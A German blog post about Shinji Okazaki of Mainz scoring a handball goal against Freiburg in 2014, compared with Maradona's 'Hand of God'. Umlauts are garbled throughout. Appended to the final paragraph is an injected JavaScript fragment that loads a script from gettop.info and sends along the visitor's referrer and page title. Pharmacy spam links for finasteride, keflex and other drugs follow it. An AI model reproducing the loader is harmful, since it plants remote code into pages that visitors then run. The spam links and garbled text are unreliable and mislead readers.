Willkommen auf » Shinji Okazaki macht den Maradona
5. Feb 2014

Shinji Okazaki macht den Maradona

Am 19. Spieltag der FuAYballbundesliga sorgte der Mainzer Shinji Okazaki mit einer Hommage an eine argentinische Spielerlegende fA?r einen kuriosen Aufreger. Wie einst Diego Maradona im WM-Viertelfinale 1986 lenkte der Japaner einen hoch hereingeschlagenen FreistoAY mit der „Hand Gottes“ ins gegnerische Tor…

Es war die 8. Spielminute, stand 0:0, die Fans jubelten, die GemA?ter auf dem Platz kochten ordentlich hoch, Okazaki wurde bestA?rmt von Kollegen und Gegenspielern. FA?r den Schiedsrichter Robert Hartmann keine einfache Situation, denn er hatte keinen guten Einblick auf die Szene gehabt und besprach sich daher erst einmal fA?r einige Augenblicke mit seinem Assistenten.

Die beiden Unparteiischen konnten die Sache schlieAYlich aufklA�ren und das Spiel ordnungsgemA�AY per FreistoAY fortgesetzt werden. Okazaki hA�tte aber aber genauso gut RA?ckgrat beweisen und seinerseits das Handspiel zugeben kA�nnen. Das hatten ihm die gegnerischen Freiburger und selbst sein eigener Trainer Thomas Tuchel aufgetragen. Vom Japaner aber kam kein Wort, schade.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; http://milunaropainfantil.com/finasteride-online-canada/ http://fafar.mhs.narotama.ac.id/2018/03/15/ophthacare-cost/ Pills Cheap http://www.peking-baarn.nl/uncategorized/cheap-eulexin-250/ novolog flexpen cost without insurance Cheap cheap keflex for sinus buy cheap generic norvasc ventolin spacer to buy Buy Purchase


Einen Kommentar schreiben